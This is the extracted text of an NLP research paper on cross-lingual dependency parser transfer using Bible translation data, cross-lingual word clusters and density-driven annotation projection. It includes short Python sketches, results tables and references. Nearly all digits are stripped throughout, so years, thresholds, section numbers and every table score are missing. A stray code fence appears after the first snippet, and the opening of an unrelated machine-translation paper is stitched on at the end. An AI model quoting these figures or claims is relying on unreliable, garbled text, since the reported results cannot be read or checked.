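import random

def make_crosslingual_corpus(mono, t, num_languages, alpha):
    """mono[i]: tokenized sentences of language i (1..num_languages);
    t(w, i, j): dictionary translation of word w from language i into
    language j, or None for NULL; alpha: replacement probability.
    Returns the mixed corpus D on which the cross-lingual clustering is learned."""
    d = []
    for i in range(1, num_languages + 1):
        for sent in mono[i]:
            s = list(sent)
            for p in range(len(s)):
                if random.random() >= alpha:        # keep the original token
                    continue
                j = random.choice(
                    [k for k in range(1, num_languages + 1) if k != i])
                w_prime = t(s[p], i, j)
                if w_prime is not None:             # replace only if a translation exists
                    s[p] = w_prime
            d.append(s)
    return d
```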
integration with the density-driven projection method of rasooli and collins ( ) in this section we describe a method for integrating our approach with the cross-lingual transfer method of rasooli and collins ( ), which makes use of density-driven projections. in annotation projection methods (hwa et al., ; mcdonald et al., ), it is assumed that we have translation data bi,j for a source and target language, and that we have a dependency parser in the source language li. the translation data con- sists of pairs (e,f) where e is a source language sentence, and f is a target language sentence. a method such as giza++ is used to derive an align- ment between the words in e and f, for each sen- tence pair; the source language parser is used to parse e. each dependency in e is then potentially transferred through the alignments to create a de- pendency in the target sentence f. once dependen- cies have been transferred in this way, a dependency parser can be trained on the dependencies in the tar- get language. the density-driven approach of rasooli and collins ( ) makes use of various definitions of “density” of the projected dependencies. for exam- ple, p is the set of projected structures where the projected dependencies form a full projective parse tree for the sentence; p is the set of projected structures where at least % of the words in the pro- jected structure are a modifier in some dependency. an iterative training process is used, where the pars- ing algorithm is first trained on the set t of com- plete structures, and where progressively less dense structures are introduced in learning. we integrate our approach with the density-driven approach of rasooli and collins ( ) as follows: consider the treebanks t . . .tm created using the lexicalization method of § . . we add all trees in these treebanks to the set p of full trees used to initialize the method of rasooli and collins ( ). in addition we make use of the representations φ(p),φ(c) and φ(l), throughout the learning process. experiments this section first describes the experimental settings, then reports results. . data and tools data in the first set of experiments, we consider european languages studied in several pieces of pre- vious work (ma and xia, ; zhang and barzi- lay, ; guo et al., ; ammar et al., a; lacroix et al., ). more specifically, we use the european languages in the google universal tree- bank (v. ; standard data) (mcdonald et al., ). as in previous work, gold part-of-speech tags are used for evaluation. we use the concatenation of the treebank training sentences, wikipedia data and the bible monolingual sentences as our monolingual raw text. table shows statistics for the monolin- gual data. we use the bible from christodouloupou- los and steedman ( ), which includes data for languages, as the source of translations. we also conduct experiments with the europarl data (both with the original set and a subset of it with the same size as the bible) to study the effects of translation data size and domain shift. the statistics for transla- tion data is shown in table . in a second set of experiments, we run experi- ments on datasets ( languages) in the more re- cent universal dependencies v . corpus (nivre et al., ). the full set of languages we use is listed in table . we use the bible as the translation data, we excluded languages that are not completely present in the bible of christodouloupoulos and steedman ( ) (an- and wikipedia as the monolingual text. 
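for concreteness, the projection step described in the previous section can be sketched as follows, assuming one-to-one intersected alignments represented as a dictionary from source to target positions. this is a simplification of the actual pipeline, and the density buckets are only illustrated by the modifier-coverage ratio, since the exact thresholds are not reproduced here:

```python
def project_dependencies(src_heads, alignment):
    """src_heads[m]: head index of source word m (-1 for the root);
    alignment: dict mapping a source position to its (single) intersected
    target position. Returns the projected, possibly partial, target arcs."""
    tgt_heads = {}
    for mod, head in enumerate(src_heads):
        if mod not in alignment:
            continue
        if head == -1:
            tgt_heads[alignment[mod]] = -1                 # projected root
        elif head in alignment:
            tgt_heads[alignment[mod]] = alignment[head]    # projected dependency
    return tgt_heads

def modifier_coverage(tgt_heads, tgt_len):
    """Fraction of target words that act as a modifier in some projected
    dependency -- the quantity over which the density buckets are defined."""
    return len(tgt_heads) / float(tgt_len)
```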
the standard training, development and test set splits are used in all experiments. the development sets are used for analysis, given in § of this paper. lang. en de es fr it pt sv #sen. . . . . . . . #token . . . . . . . #type . . . . . . . table : sizes of the monolingual datasets for each of our languages. all numbers are in millions. brown clustering algorithm we use the off-the- shelf brown clustering tool (liang, ) to train monolingual brown clusters with clusters. the monolingual brown clusters are used as features over lexicalized values created in φ(l), and in self- training experiments. we train our cross-lingual clustering with the off-the-shelf-tool from stratos et al. ( ). we set the window size to with a cluster size of . parsing model we use the k-beam arc-eager de- pendency parser of rasooli and tetreault ( ), which is similar to the model of zhang and nivre ( ). we modify the parser such that it can use both monolingual and cross-lingual word clus- ter features. the parser is trained using the the max- imum violation update strategy (huang et al., ). we use three epochs of training for all experiments. we use the dependable tool (choi et al., ) to calculate significance tests on several of the com- parisons (details are given in the captions to tables , , and ). cient greek, basque, catalan, galician, gothic, irish, kazakh, latvian, old church slavonic, and tamil). we also excluded arabic, hebrew, japanese and chinese, as these languages have tokenization and/or morphological complexity that goes beyond the scope of this paper. future work should consider these lan- guages. https://github.com/percyliang/ brown-cluster https://github.com/karlstratos/singular usually the original brown clusters are better features for parsing but their training procedure does not scale well to large datasets. therefore we use the more efficient algorithm from stratos et al. ( ) on the larger cross-lingual datasets to obtain word clusters. data lang. en de es fr it pt sv bible tokens . m k k k k k k types k k k k k k k eu-s tokens k k k k k k k types k k k k k k k europarl tokens m m m m m m m types k k k k k k k table : statistics for the bible, sampled europarl (eu- s) and europarl datasets. each individual bible text file from christodouloupoulos and steedman ( ) consists of sentences, except for english datasets, where two translations into english are available, giving dou- ble the amount of data. each text file from the sampled europarl datasets consists of k sentences and europarl has approximately million sentences per language pair. l baseline this paper using the bible § . § . § . las uas las uas las uas las uas en . . . . . . . . de . . . . . . . . es . . . . . . . . fr . . . . . . . . it . . . . . . . . pt . . . . . . . . sv . . . . . . . . avg . . . . . . . . table : performance of different models in this paper; first the baseline model, then models trained using the methods described in sections § . – . . all results make use of the bible as a source of translation data. all differ- ences in uas and las are statistically significant with p < . using mcnemar’s test, with the exception of “de” uas/las baseline vs. . (i.e., . vs . uas and . vs . las are not significant differences). word alignment we use the intersected align- ments from giza++ (och and ney, ) on trans- lation data. we exclude sentences in translation data with more than words. . 
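the alignment preprocessing just described, symmetrizing the two directional giza++ runs by intersection and discarding overly long sentence pairs, can be sketched as below. giza++ itself is an external tool, and the length cutoff used in the paper is not reproduced here; names are illustrative:

```python
def intersect_alignments(forward, reverse):
    """forward: set of (src_idx, tgt_idx) links from the source-to-target
    GIZA++ run; reverse: set of (tgt_idx, src_idx) links from the reverse run.
    Keeps only links supported by both directions."""
    return set(forward) & {(s, t) for (t, s) in reverse}

def filter_long_pairs(bitext, alignments, max_len):
    """Drop sentence pairs in which either side exceeds max_len tokens."""
    kept_pairs, kept_links = [], []
    for (src, tgt), links in zip(bitext, alignments):
        if len(src) <= max_len and len(tgt) <= max_len:
            kept_pairs.append((src, tgt))
            kept_links.append(links)
    return kept_pairs, kept_links
```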
results on the google treebank table shows the dependency parsing accuracy for the baseline delexicalized approach, and for models which add ) cross-lingual clusters (§ . ); ) lexical features (§ . ); and ) integration with the density- driven method of rasooli and collins ( ). each of these three steps gives significant improvements in performance. the final las/uas of . / . % is several percentage points higher than the baseline accuracy of . / . %. lang. bible europarl-sample europarl density this paper density this paper density this paper las uas las uas las uas las uas las uas las uas en . . . . . . . . . . . . de . . . . . . . . . . . . es . . . . . . . . . . . . fr . . . . . . . . . . . . it . . . . . . . . . . . . pt . . . . . . . . . . . . sv . . . . . . . . . . . . avg . . . . . . . . . . . . table : results for our method using different sources of translation data. “density” refers to the method of rasooli and collins ( ); “this paper” gives results using the methods described in sections . – . of this paper. the “bible” experiments use the bible data of christodouloupoulos and steedman ( ). the “europarl” experiments use the europarl data of koehn ( ). the “europarl-sample” experiments use k randomly chosen sentences from europarl; this gives a similar number of sentences to the bible data. all differences in las and uas in this table between the density and “this paper” settings (i.e., for the bible, europarl-sample and europarl settings) are found to be statistically significant according to mcnemar’s sign test. lang. mx la zb gcy amb rc this paper supervised bible europarl uas uas las uas las uas las uas las uas las uas las uas en – – . . – – – – . . . . . . . . de . . . . . . . . . . . . . . . . es . . . . . . . . . . . . . . . . fr . . . . . . . . . . . . . . . . it . . . . . . . . . . . . . . . . pt . – . . . . . . . . . . . . . . sv . . . . . . . . . . . . . . . . avg\en . – . . . . . . . . . . . . . . table : comparison of our work using the bible and europarl data, with previous work: mx (ma and xia, ), la (lacroix et al., ), zb (zhang and barzilay, ), gcy (guo et al., ), amb (ammar et al., b), and rc (rasooli and collins, ). “supervised” refers to the performance of the parser trained on fully gold standard data in a supervised fashion (i.e. the practical upper-bound of our model). “avg\en” refers to the average accuracy for all datasets except english. comparison to the density-driven approach us- ing europarl data table shows accuracies for the density-driven approach of rasooli and collins ( ), first using europarl data and second using the bible alone (with no cross-lingual clusters or lex- icalization). the bible data is considerably smaller than europarl (around times smaller), and it can be seen that results using the bible are several per- centage points lower than the results for europarl ( . % uas vs. . % uas). integrating cluster- based and lexicalized features described in the cur- rent paper with the density-driven approach closes much of this gap in performance ( . % uas). thus we have demonstrated that we can get close to the performance of the europarl-based models using rasooli and collins ( ) do not report results on english. we use the same setting to obtain the english results. only the bible as a source of translation data. us- ing our approach on the full europarl data gives an average uas of . %, an improvement from the . % uas of rasooli and collins ( ). 
table also shows results when we use a random subset of the europarl data, in which the number of sentences ( , ) is chosen to give a very similar size to the bible. it can be seen that accuracies using the bible vs. the europarl-sample are very similar ( . % vs. . % uas), suggesting that the size of the translation corpus is much more important than the genre. comparison to other previous work table compares the accuracy of our method to the follow- ing related work: ) ma and xia ( ), who de- scribe an annotation projection method based on en- tropy regularization; ) lacroix et al. ( ), who lang. rc this paper (§ . ) bible europarl las uas las uas las uas en . . . . . . de . . . . . . es . . . . . . fr . . . . . . it . . . . . . pt . . . . . . sv . . . . . . avg . . . . . . table : the final results based on automatic part of speech tags. rc refers to the best performing model of rasooli and collins ( ). describe an annotation projection method based on training on partial trees with dynamic oracles; ) zhang and barzilay ( ), who describe a method that learns cross-lingual embeddings and bilingual dictionaries from europarl data, and uses these fea- tures in a discriminative parsing model; ) guo et al. ( ), who describe a method that learns cross- lingual embeddings from europarl data and uses a shift-reduce neural parser with these representa- tions; ) ammar et al. ( b) , who use the same embeddings as guo et al. ( ), within an lstm- based parser; and ) rasooli and collins ( ) who use the density-driven approach on the europarl data. our method gives significant improvements over the first three models, in spite of using the bible translation data rather than europarl. when using the europarl data, our method improves the state-of- the-art model of rasooli and collins ( ). performance with automatic pos tags for completeness, table gives results for our method with automatic part-of-speech tags. the tags are ob- tained using the model of collins ( ) trained on the training part of the treebank dataset. future work should study approaches that transfer pos tags in addition to dependencies. . results on the universal dependencies v . table gives results on datasets ( languages) from the newly released universal dependencies cor- pus (nivre et al., ). given the number of tree- banks and to speed up training, we pick source lan- this work was later published under a different title (am- mar et al., a) without including uas results. https://github.com/rasoolims/ semisupervisedpostagger dataset density this paper supervised las uas las uas las uas it . . . . . . sl . . . . . . es . . . . . . bg . . . . . . pt . . . . . . es-ancora . . . . . . fr . . . . . . sv-lines . . . . . . pt-br . . . . . . sv . . . . . . no . . . . . . pl . . . . . . hr . . . . . . cs-cac . . . . . . da . . . . . . en-lines . . . . . . cs . . . . . . id . . . . . . de . . . . . . ru-syntagrus . . . . . . ru . . . . . . cs-cltt . . . . . . ro . . . . . . la . . . . . . nl-lassysmall . . . . . . el . . . . . . et . . . . . . hi . . . . . . hu . . . . . . en . . . . . . fi-ftb . . . . . . fi . . . . . . la-ittb . . . . . . nl . . . . . . la-proiel . . . . . . sl-sst . . . . . . fa . . . . . . tr . . . . . . average . . . . . . table : results for the density driven method (rasooli and collins, ) and ours using the bible data on the universal dependencies v . (nivre et al., ). the ta- ble is sorted by the performance of our method. the last major columns shows the performance of the supervised parser. 
the abbreviations are as follows: bg (bulgarian), cs (czech), da (danish), de (german), el (greek), en (en- glish), es (spanish), et (estonian), fa (persian (farsi)), fi (finnish), fr (french), hi (hindi), hr (croatian), hu (hun- garian), id (indonesian), it (italian), la (latin), nl (dutch), no (norwegian), pl (polish), pt (portuguese), ro (roma- nian), ru (russian), sl (slovenian), sv (swedish), and tr (turkish). all differences in las and uas in this ta- ble were found to be statistically significant according to mcnemar’s sign test with p < . . guages that have at least out of common wals properties with each target language. our experi- ments are carried out using the bible as our transla- tion data. as shown in table , our method consis- tently outperforms the density-driven method of ra- sooli and collins ( ) and for many languages the accuracy of our method gets close to the accuracy of the supervised parser. in all the languages, our method is significantly better than the density-driven method using the mcnemar’s test with p < . . accuracy on some languages (e.g., persian (fa) and turkish (tr)) is low, suggesting that future work should consider more powerful techniques for these languages. there are two important facts to note. first, the number of fully projected trees in some languages is so low such that the density-driven ap- proach cannot start with a good initialization to fill in partial dependencies. for example turkish has only one full tree with only six words, persian with trees, and dutch with trees. second, we ob- serve very low accuracies in supervised parsing for some languages in which the number of training sen- tences is very low (for example, latin has only projective trees in the training data). analysis we conclude with some analysis of the accuracy of the method on different dependency types, across the different languages. table shows precision and recall on different dependency types in english (using the google treebank). the improvements in accuracy when moving from the delexicalized model to the bible or europarl model apply quite uniformly across all dependency types, with all de- pendency labels showing an improvement. table shows the dependency accuracy sorted by part-of-speech tag of the modifier in the depen- dency. we break the results into three groups: g languages, where uas is at least % overall; g languages, where uas is between % and %; and g languages, where uas is less than %. there are some quite significant differences in ac- curacy depending on the pos of the modifier word. in the g languages, for example, adp, det, adj, pron and aux all have over % accuracy; in con- trast noun, verb, propn, adv all have accu- racy that is less than %. a very similar pattern is seen for the g languages, with adp, det, adj, and aux again having greater than % accuracy, but noun, verb, propn and adv having lower accuracies. these results suggest that difficulty varies quite significantly depending on the modifier pos, and different languages show the same pat- terns of difficulty with respect to the modifier pos. table shows accuracy sorted by the pos tag of the head word of the dependency. by far the most frequent head pos tags are noun, verb, and propn (accounting for % of all dependen- cies). the table also shows that for all language groups g , g , and g , the f scores for noun, verb and propn are generally higher than the f scores for other head pos tags. 
finally, table shows precision and recall for different dependency labels for the g , g and g languages. we again see quite large differences in accuracy between different dependency labels. the g language dependencies, with the most frequent label nmod, has an f-score of . . in contrast, the second most frequent label, case, has . f-score. other frequent labels with low accuracy in the g languages are advmod, conj, and cc. related work there has recently been a great deal of work on syntactic transfer. a number of methods (zeman and resnik, ; mcdonald et al., ; cohen et al., ; naseem et al., ; täckström et al., ; rosa and zabokrtsky, ) directly learn delexicalized models that can be trained on universal treebank data from one or more source languages, then applied to the target language. more recent work has introduced cross-lingual representations— for example cross-lingual word-embeddings—that can be used to improve performance (zhang and barzilay, ; guo et al., ; duong et al., a; duong et al., b; guo et al., ; am- mar et al., b). these cross-lingual represen- tations are usually learned from parallel translation data. we show results of several methods (zhang and barzilay, ; guo et al., ; ammar et al., b) in table of this paper. the annotation projection approach, where de- pendencies from one language are transferred through translation alignments to another language, has been considered by several authors (hwa et al., ; ganchev et al., ; mcdonald et al., ; ma and xia, ; rasooli and collins, ; dependency freq delexicalized bible europarl prec./rec. f prec./rec. f prec./rec. f adpmod . . / . . . / . . . / . . adpobj . . / . . . / . . . / . . det . . / . . . / . . . / . . compmod . . / . . . / . . . / . . nsubj . . / . . . / . . . / . . amod . . / . . . / . . . / . . root . . / . . . / . . . / . . num . . / . . . / . . . / . . dobj . . / . . . / . . . / . . advmod . . / . . . / . . . / . . aux . . / . . . / . . . / . . cc . . / . . . / . . . / . . conj . . / . . . / . . . / . . dep . . / . . . / . . . / . . poss . . / . . . / . . . / . . ccomp . . / . . . / . . . / . . adp . . / . . . / . . . / . . nmod . . / . . . / . . . / . . xcomp . . / . . . / . . . / . . mark . . / . . . / . . . / . . advcl . . / . . . / . . . / . . appos . . / . . . / . . . / . . auxpass . . / . . . / . . . / . . rcmod . . / . . . / . . . / . . nsubjpass . . / . . . / . . . / . . acomp . . / . . . / . . . / . . adpcomp . . / . . . / . . . / . . partmod . . / . . . / . . . / . . attr . . / . . . / . . . / . . neg . . / . . . / . . . / . . prt . . / . . . / . . . / . . infmod . . / . . . / . . . / . . expl . . / . . . / . . . / . . iobj . . / . . . / . . . / . . mwe . . / . . . / . . . / . . parataxis . . / . . . / . . . / . . cop . . / . . . / . . . / . . csubj . . / . . . / . . . / . . csubjpass . . / . . . / . . . / . . rel . . / . . . / . . . / . . table : precision, recall and f-score of different depen- dency relations on the english development data of the google universal treebank. the major columns show the dependency labels (“dep.”), frequency (“freq.”), the base- line delexicalized model (“delex”), and our method using the bible and europarl (“eu”) as translation data. the rows are sorted by frequency. lacroix et al., ; agić et al., ; schlichtkrull and søgaard, ). 
other recent work (tiedemann et al., ; tiede- mann, ; tiedemann and agić, ) has con- sidered treebank translation, where a statistical ma- chine translation system (e.g., moses (koehn et al., )) is used to translate a source language treebank into the target language, complete with re- ordering of the input sentence. the lexicalization pos g g g freq% acc. freq% acc. freq% acc. noun . . . . . . adp . . . . . . det . . . . . . verb . . . . . . propn . . . . . . adj . . . . . . pron . . . . . . adv . . . . . . conj . . . . . . aux . . . . . . num . . . . . . sconj . . . . . . part . . . . . . x . . . . . . sym . . . . . . intj . . . . . . table : accuracy of unlabeled dependencies by pos of the modifier word, for three groups of languages for the universal dependencies experiments in table : g (languages with uas ≥ ), g (languages with ≤ uas < ), g (languages with uas < ). the rows are sorted by frequency in the g languages. approach described in this paper is a simple form of treebank translation, where we use a word-to-word translation model. in spite of its simplicity, it is an effective approach. a number of authors have considered incorporat- ing universal syntactic properties, such as depen- dency order, by selectively learning syntactic at- tributes from similar source languages (naseem et al., ; täckström et al., ; zhang and barzi- lay, ; ammar et al., a). selective shar- ing of syntactic properties is complementary to our work. we used a very limited form of selective shar- ing, through the wals properties, in our baseline approach. more recently, wang and eisner ( ) have developed a synthetic treebank as a universal treebank to help learn parsers for new languages. martı́nez alonso et al. ( ) try a very different approach in cross-lingual transfer by using a rank- ing approach. a number of authors (täckström et al., ; guo et al., ; guo et al., ) have introduced methods that learn cross-lingual representations that are then used in syntactic transfer. most of these approaches introduce constraints to a clustering or embedding algorithm that encourage words that are translations of each other to have similar represen- tations. our method of deriving a cross-lingual cor- pos g g g freq% prec. rec. f freq% prec. rec. f freq% prec. rec. f noun . . . . . . . . . . . . verb . . . . . . . . . . . . propn . . . . . . . . . . . . adj . . . . . . . . . . . . pron . . . . . . . . . . . . num . . . . . . . . . . . . adv . . . . . . . . . . . . adp . . . . . . . . . . . . sym . . . . . . . . . . . . det . . . . . . . . . . . . aux . . . . . . . . . . . . x . . . . . . . . . . . . sconj . . . . . . . . . . . . part . . . . . . . . . . . . conj . . . . . . . . . . . . intj . . . . . . . . . . . . table : precision, recall and f-score of unlabeled dependency attachment for different pos tags as head for three groups of languages for the universal dependencies experiments in table : g (languages with uas ≥ ), g (languages with ≤ uas < ), g (languages with uas < ). the rows are sorted by frequency in the g languages. pus (see figure ) is closely related to duong et al. ( a); gouws and søgaard ( ); and wick et al. ( ). our work has made use of dictionaries that are automatically extracted from bilingual corpora. an alternative approach would be to use hand-crafted translation lexicons, for example, panlex (bald- win et al., ) (e.g. see duong et al. ( b)), which covers language varieties, google trans- late (e.g., see ammar et al. ( c)), or wiktionary (e.g., see durrett et al. 
( ) for an approach that uses wiktionary for cross-lingual transfer). these resources are potentially very rich sources of in- formation. future work should investigate whether they can give improvements in performance. conclusions we have described a method for cross-lingual syn- tactic transfer that is effective in a scenario where a large amount of translation data is not available. we have introduced a simple, direct method for deriving cross-lingual clusters, and for transferring lexical in- formation across treebanks for different languages. experiments with this method show that the method gives improved performance over previous work that makes use of europarl, a much larger translation cor- pus. acknowledgement we thank the anonymous reviewers for their valu- able feedback. we also thank ryan mcdonald, karl stratos and oscar täckström for their comments on the first draft. appendix a parsing features we used all features in zhang and nivre ( , ta- ble and ), which describes features based on the word and part-of-speech at various positions on the stack and buffer of the transition system. in addi- tion, we expand the zhang and nivre ( , table ) features to include clusters, as follows: whenever a feature tests the part-of-speech for a word in po- sition of the stack or buffer, we introduce features that replace the part-of-speech with the brown clus- tering bit-string of length and . whenever a fea- ture tests for the word identity at position of the stack or buffer, we introduce a cluster feature that replaces the word with the full cluster feature. we take the cross product of all features corresponding to the choice of or length bit string for part-of- speech features. references željko agić, anders johannsen, barbara plank, héctor alonso martı́nez, natalie schluter, and an- ders søgaard. . multilingual projection for dep. g g g freq% prec. rec. f freq% prec. rec. f freq% prec. rec. f nmod . . . . . . . . . . . . case . . . . . . . . . . . . det . . . . . . . . . . . . nsubj . . . . . . . . . . . . amod . . . . . . . . . . . . dobj . . . . . . . . . . . . root . . . . . . . . . . . . advmod . . . . . . . . . . . . conj . . . . . . . . . . . . cc . . . . . . . . . . . . mark . . . . . . . . . . acl . . . . . . . . . . . . aux . . . . . . . . . . . . name . . . . . . . . . . . . cop . . . . . . . . . . . nummod . . . . . . . . . . . . advcl . . . . . . . . . . . . appos . . . . . . . . . . . . mwe . . . . . . . . . . . . xcomp . . . . . . . . . . . . ccomp . . . . . . . . . . . . neg . . . . . . . . . . . iobj . . . . . . . . . . . . expl . . . . . . . . . . . auxpass . . . . . . . . . . . . nsubjpass . . . . . . . . . . . . parataxis . . . . . . . . . . . . compound . . . . . . . . . . . . csubj . . . . . . . . . . . . dep . . . . . . . . . . . . discourse . . . . . . . . . . . . foreign . . . . . . . . . . . . goeswith . . . . . . . . . . . . csubjpass . . . . . . . . . . . . list . – – – . . . . . . . . remnant . . . . . . . . . . . . reparandum . – – – . – – – . . . . vocative . . . . . . . . . . . . dislocated . . . . . . . . . . . . table : precision, recall and f-score for different dependency labels for three groups of languages for the universal dependencies experiments in table : g (languages with uas ≥ ), g (languages with ≤ uas < ), g (languages with uas < ). the rows are sorted by frequency in the g languages. parsing truly low-resource languages. transactions of the association for computational linguistics, : – . 
waleed ammar, george mulcaire, miguel ballesteros, chris dyer, and noah smith. a. many languages, one parser. transactions of the association for com- putational linguistics, : – . waleed ammar, george mulcaire, miguel ballesteros, chris dyer, and noah a. smith. b. one parser, many languages. arxiv preprint arxiv: . v . waleed ammar, george mulcaire, yulia tsvetkov, guil- laume lample, chris dyer, and noah a. smith. c. massively multilingual word embeddings. arxiv preprint arxiv: . . timothy baldwin, jonathan pool, and susan m colow- ick. . panlex and lextract: translating all words of all languages of the world. in proceedings of the rd international conference on computational linguistics: demonstrations, pages – . associa- tion for computational linguistics. peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . jinho d. choi, joel tetreault, and amanda stent. . it depends: dependency parser comparison using a web-based evaluation tool. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the asian federa- tion of natural language processing, acl, pages – . christos christodouloupoulos and mark steedman. . a massively parallel corpus: the bible in languages. language resources and evaluation, pages – . shay b. cohen, dipanjan das, and noah a. smith. . unsupervised structure prediction with non-parallel multilingual guidance. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scotland, uk., july. association for computational linguistics. michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the conference on empirical methods in natu- ral language processing, pages – . association for computational linguistics, july. matthew s. dryer and martin haspelmath, editors. . wals online. max planck institute for evolutionary anthropology, leipzig. long duong, trevor cohn, steven bird, and paul cook. a. cross-lingual transfer for unsupervised depen- dency parsing without parallel data. in proceedings of the nineteenth conference on computational natural language learning, pages – , beijing, china, july. association for computational linguistics. long duong, trevor cohn, steven bird, and paul cook. b. a neural network model for low-resource uni- versal dependency parsing. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, por- tugal, september. association for computational lin- guistics. greg durrett, adam pauls, and dan klein. . syntac- tic transfer using a bilingual lexicon. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – , jeju island, korea, july. association for computational linguis- tics. kuzman ganchev, jennifer gillenwater, and ben taskar. . dependency grammar induction via bitext pro- jection constraints. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. association for computational linguistics. stephan gouws and anders søgaard. . simple task- specific bilingual word embeddings. 
in proceedings of the conference of the north american chapter of the association for computational linguistics: hu- man language technologies, pages – , den- ver, colorado, may–june. association for computa- tional linguistics. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . cross-lingual dependency parsing based on distributed representations. in pro- ceedings of the rd annual meeting of the associa- tion for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . a representation learning framework for multi-source transfer parsing. in the thirtieth aaai conference on artificial intelligence (aaai- ), phoenix, arizona, usa. liang huang, suphan fayong, and yang guo. . structured perceptron with inexact search. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , montréal, canada, june. association for compu- tational linguistics. rebecca hwa, philip resnik, amy weinberg, clara cabezas, and okan kolak. . bootstrapping parsers via syntactic projection across parallel texts. natural language engineering, ( ): – . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, et al. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meet- ing of the acl on interactive poster and demonstra- tion sessions, acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. philipp koehn. . europarl: a parallel corpus for sta- tistical machine translation. in mt summit, volume , pages – . ophélie lacroix, lauriane aufrant, guillaume wis- niewski, and françois yvon. . frustratingly easy cross-lingual transfer for transition-based dependency parsing. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , san diego, california, june. association for computational linguistics. percy liang. . semi-supervised learning for natural language. master’s thesis, massachusetts institute of technology. xuezhe ma and fei xia. . unsupervised depen- dency parsing with transferring distribution via paral- lel guidance and entropy regularization. in proceed- ings of the nd annual meeting of the association for computational linguistics (volume : long papers), pages – , baltimore, maryland, june. asso- ciation for computational linguistics. héctor martı́nez alonso, željko agić, barbara plank, and anders søgaard. . parsing universal de- pendencies without training. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics: volume , long papers, pages – . association for compu- tational linguistics. david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in pro- ceedings of the main conference on human language technology conference of the north american chap- ter of the association of computational linguistics, hlt-naacl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. ryan mcdonald, slav petrov, and keith hall. . multi-source transfer of delexicalized dependency parsers. 
in proceedings of the conference on empirical methods in natural language processing, pages – , edinburgh, scotland, uk., july. associ- ation for computational linguistics. ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, et al. . universal dependency annotation for multilin- gual parsing. in proceedings of the st annual meet- ing of the association for computational linguistics (volume : short papers), pages – , sofia, bul- garia, august. association for computational linguis- tics. tahira naseem, regina barzilay, and amir globerson. . selective sharing for multilingual dependency parsing. in proceedings of the th annual meet- ing of the association for computational linguistics: long papers-volume , pages – . association for computational linguistics. joakim nivre, željko agić, lars ahrenberg, maria jesus aranzabe, masayuki asahara, et al. . universal dependencies . . lindat/clarin digital library at institute of formal and applied linguistics, charles university in prague. franz josef och and hermann ney. . a system- atic comparison of various statistical alignment mod- els. computational linguistics, ( ): – . mohammad sadegh rasooli and michael collins. . density-driven cross-lingual transfer of dependency parsers. in proceedings of the conference on empirical methods in natural language processing, pages – , lisbon, portugal, september. associ- ation for computational linguistics. mohammad sadegh rasooli and joel tetreault. . yara parser: a fast and accurate dependency parser. arxiv preprint arxiv: . . rudolf rosa and zdenek zabokrtsky. . klcpos - a language similarity measure for delexicalized parser transfer. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : short papers), pages – , beijing, china, july. association for com- putational linguistics. michael schlichtkrull and anders søgaard. . cross- lingual dependency parsing with late decoding for truly low-resource languages. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics: volume , long papers, pages – . association for compu- tational linguistics. karl stratos, michael collins, and daniel hsu. . model-based word embeddings from decompositions of count matrices. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proceedings of the con- ference of the north american chapter of the associ- ation for computational linguistics: human language technologies, pages – . association for compu- tational linguistics. oscar täckström, ryan mcdonald, and joakim nivre. . target language adaptation of discriminative transfer parsers. in proceedings of the con- ference of the north american chapter of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , atlanta, geor- gia, june. association for computational linguistics. jörg tiedemann and željko agić. . synthetic tree- banking for cross-lingual dependency parsing. jour- nal of artificial intelligence research, : – . jörg tiedemann, željko agić, and joakim nivre. . 
treebank translation for cross-lingual parser induc- tion. in proceedings of the eighteenth conference on computational natural language learning, pages – , ann arbor, michigan, june. association for computational linguistics. jörg tiedemann. . improving the cross-lingual pro- jection of syntactic dependencies. in nordic confer- ence of computational linguistics nodalida , pages – . dingquan wang and jason eisner. . the galactic dependencies treebanks: getting more data by synthe- sizing new languages. transactions of the association for computational linguistics, : – . michael wick, pallika kanani, and adam pocock. . minimally-constrained multilingual embeddings via artificial code-switching. in workshop on transfer and multi-task learning: trends and new perspec- tives, montreal, canada, december. min xiao and yuhong guo. . annotation projection-based representation learning for cross- lingual dependency parsing. in proceedings of the nineteenth conference on computational natu- ral language learning, pages – , beijing, china, july. association for computational linguistics. daniel zeman and philip resnik. . cross-language parser adaptation between related languages. in pro- ceedings of the ijcnlp- workshop on nlp for less privileged languages, pages – . yuan zhang and regina barzilay. . hierarchi- cal low-rank tensors for multilingual transfer parsing. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , lisbon, portugal, september. association for computational linguistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon, usa, june. association for computational lin- guistics. dynamically shaping the reordering search space of phrase-based statistical machine translation arianna bisazza and marcello federico fondazione bruno kessler trento, italy {bisazza,federico}@fbk.eu abstract defining the reordering search space is a cru- cial issue in phrase-based smt between dis- tant languages. in fact, the 